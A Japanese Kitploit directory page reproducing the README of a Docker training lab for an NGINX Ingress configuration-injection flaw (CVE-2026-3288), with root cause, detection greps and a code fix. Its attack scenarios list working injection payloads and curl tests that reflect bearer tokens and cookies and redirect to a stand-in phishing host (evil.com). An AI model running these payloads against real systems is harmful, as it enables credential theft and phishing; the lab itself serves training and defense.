Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-3288-lab — Dockerベースの脆弱性ラボ。CVE-2026-3288 NGINX Ingress設定インジェクションを対象とし、エクスプロイトスクリプト、検知モニタリング、および許可されたセキュリティトレーニング向けの修復ガイダンスを備えています。 | Kitploit
ツール/GitHubGitHub/bvabhishek/cve-2026-3288-lab
クラウドインフラストラクチャセキュリティコンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用構成監査ペネトレーションテスト学習と教育ラボと実践
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

Dockerベースの脆弱性ラボ。CVE-2026-3288 NGINX Ingress設定インジェクションを対象とし、エクスプロイトスクリプト、検知モニタリング、および許可されたセキュリティトレーニング向けの修復ガイダンスを備えています。

165ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-3288 脆弱性ラボ(Docker)

NGINX Ingress Controller 設定インジェクション

⚠️ 警告: このラボには意図的に脆弱な設定が含まれており、認可されたセキュリティトレーニング専用です。

脆弱性の概要

CVE-2026-3288(CVSS 8.8 HIGH)- NGINX Ingress Controller における設定インジェクション

  • 影響を受けるバージョン: < v1.13.8、v1.14.4、v1.15.0
  • 攻撃ベクトル: パス設定における二重引用符(")インジェクション
  • 影響: リモートコード実行、シークレット開示、認証情報の窃取
  • 関連: CVE-2026-24512(類似のパスインジェクション)

根本原因

buildProxyPass() 関数は、パス入力を nginx 設定に補間する前にサニタイズしないため、攻撃者が引用符で囲まれた文字列を脱出し、任意の nginx ディレクティブを注入することが可能です。

ラボの構成要素

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # このファイル
├── docker-compose.yml                 # メインのラボ設定
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # 脆弱な NGINX 設定
│   │   ├── nginx.conf                # 基本設定
│   │   └── vulnerable-config.conf    # 脆弱なパス処理
│   └── backend/
│       ├── Dockerfile                # シンプルなバックエンドアプリ
│       └── app.py                    # Flask アプリケーション
├── exploits/
│   ├── exploit.py                    # 自動化されたエクスプロイトスクリプト
│   ├── payloads.txt                  # エクスプロイトペイロードのコレクション
│   └── test-exploits.sh              # すべてのエクスプロイトをテスト
├── detection/
│   └── monitor-logs.sh               # エクスプロイト試行の監視
└── cleanup/
    └── cleanup.sh                    # すべてのラボリソースを削除

前提条件

  • Docker がインストールされていること
  • Docker Compose がインストールされていること
  • Python 3.6+(エクスプロイトスクリプト用)
  • curl または wget
  • 最小 2GB RAM

クイックスタート

1. ラボの起動

root@kitploit:~
cd CVE-2026-3288-lab

# 脆弱な環境を起動
docker-compose up -d

# ステータスを確認
docker-compose ps

2. インストールの確認

root@kitploit:~
# バックエンドの動作をテスト
curl http://localhost:8080/

# NGINX の動作をテスト
curl http://localhost/

3. エクスプロイトの実行

root@kitploit:~
cd exploits

# 自動化されたエクスプロイト
python3 exploit.py --all

# または個別のエクスプロイトをテスト
bash test-exploits.sh

4. ログの監視

root@kitploit:~
# エクスプロイトの NGINX ログを監視
docker-compose logs -f nginx

# 検出の監視
cd detection
bash monitor-logs.sh

5. クリーンアップ

root@kitploit:~
docker-compose down -v

攻撃シナリオ

シナリオ 1: レスポンスハイジャック

nginx の return ディレクティブを注入して、攻撃者が制御するコンテンツを配信します。

ペイロード:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

テスト:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

シナリオ 2: 認証情報の窃取

Authorization ヘッダーをレスポンスに反映させて Bearer トークンを窃取します。

ペイロード:

root@kitploit:~
/login" return 200 "Token: $http_authorization

テスト:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

シナリオ 3: フィッシングリダイレクト

攻撃者が制御するフィッシングサイトへユーザーをリダイレクトします。

ペイロード:

root@kitploit:~
/" return 302 "https://evil.com/phishing

テスト:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

シナリオ 4: 内部 IP の開示

内部サーバー情報を漏洩させます。

ペイロード:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

テスト:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

シナリオ 5: Cookie の窃取

セッション Cookie を窃取します。

ペイロード:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

テスト:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

仕組み

脆弱なコードパターン

root@kitploit:~
# 脆弱な設定
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

エクスプロイト

パスに " が含まれると、引用符で囲まれた文字列が壊れます:

root@kitploit:~
# 攻撃者の入力: /api" return 200 "HACKED
# 結果:
location ~ "^/api" return 200 "HACKED" {
    # 元の設定は壊れている
}

検出

ログ監視

root@kitploit:~
# 不審なパターンを監視
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

手動検出

root@kitploit:~
# 注入されたディレクティブの NGINX 設定を確認
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

修復

即時対応

  1. 入力検証 - すべてのパス入力をサニタイズ
  2. 特殊文字のエスケープ - " と \ を適切にエスケープ
  3. 許可リストの使用 - 既知の安全なパスのみを許可
  4. ログの監視 - 不審なパターンにアラート

コード修正

root@kitploit:~
// 修正前(脆弱)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// 修正後(修正済み)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

学習目標

このラボを完了すると、以下を理解できます:

  1. ✅ 設定インジェクションの脆弱性がどのように機能するか
  2. ✅ 不十分な入力サニタイズの影響
  3. ✅ 複数のエクスプロイト手法
  4. ✅ ログ分析による検出方法
  5. ✅ 適切な修復戦略

トラブルシューティング

コンテナが起動しない

root@kitploit:~
# ログを確認
docker-compose logs

# 再起動
docker-compose restart

ポートがすでに使用中

root@kitploit:~
# docker-compose.yml でポートを変更
# または競合するサービスを停止
sudo lsof -i :80

エクスプロイトが機能しない

root@kitploit:~
# NGINX が実行されているか確認
docker-compose ps nginx

# NGINX 設定を確認
docker exec cve-2026-3288-nginx nginx -t

セキュリティに関する注意事項

  • ⚠️ 隔離されたラボ環境でのみ使用してください
  • ⚠️ 本番システムには絶対にデプロイしないでください
  • ⚠️ インターネットに絶対に公開しないでください
  • ⚠️ テスト前に適切な認可を確保してください
  • ⚠️ 責任ある開示の慣行に従ってください

参考情報

  • CVE-2026-3288 アドバイザリ
  • 修正 PR #14667
  • Sysdig 分析

認可されたセキュリティトレーニングおよび研究目的のみで作成されています

ツールをダウンロード